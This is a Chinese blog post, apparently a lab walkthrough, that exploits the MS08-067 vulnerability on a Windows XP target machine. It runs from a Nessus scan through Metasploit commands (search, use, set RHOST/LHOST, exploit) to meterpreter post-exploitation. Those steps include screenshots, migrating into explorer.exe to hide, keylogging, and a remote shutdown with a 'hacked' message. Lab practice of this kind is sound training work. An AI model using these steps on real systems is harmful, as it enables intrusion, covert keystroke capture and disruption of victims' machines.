linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP

一、Nessus扫描漏洞​

a4c26d1e5885305701be709a3d33442f.png

二、metasploit渗透

启动metasploit,输入命令msfconsole​​

a4c26d1e5885305701be709a3d33442f.png

使用search 命令搜索未打补丁编号,search ms08-067 ​

a4c26d1e5885305701be709a3d33442f.png

使用由nessus确定的攻击程序,use

攻击程序。再查看配置的信息​

a4c26d1e5885305701be709a3d33442f.png

设置接收主机IP和发送主机IP地址,再查看配置信息,确定​

set RHOST 靶机IP​

set LHOST 发起攻击主机IP​​

show options​

a4c26d1e5885305701be709a3d33442f.png

开始渗透攻击,exploit​

a4c26d1e5885305701be709a3d33442f.png

成功进入meterpreter shell,输入screenshot可捕捉靶机桌面

a4c26d1e5885305701be709a3d33442f.png

查看捕捉到的靶机图片,输入命令后,即可打开捕捉到的图片​

a4c26d1e5885305701be709a3d33442f.png

查看meterpreter的id号,getpid。查看explorer.exe的ID号。

a4c26d1e5885305701be709a3d33442f.png

接下来需要隐藏id到explorer.exe中。migrate

1400,再查看当前meterpreter的id是否隐藏好

a4c26d1e5885305701be709a3d33442f.png

启动键盘记录keyscan_start,转储从靶机获取的键盘记录keyscan_dump,终止键盘记录keyscan_stop。

a4c26d1e5885305701be709a3d33442f.png

查看靶机正在运行的用户

a4c26d1e5885305701be709a3d33442f.png

进入shell,这里面做个测试在C盘根目录创建一个文件夹为test_file

a4c26d1e5885305701be709a3d33442f.png

在靶机系统中可以看见test_file文件夹

a4c26d1e5885305701be709a3d33442f.png

在20秒后关闭对方系统,并显示信息your computer has been hacked

a4c26d1e5885305701be709a3d33442f.png

靶机被关闭,且有消息提示

a4c26d1e5885305701be709a3d33442f.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值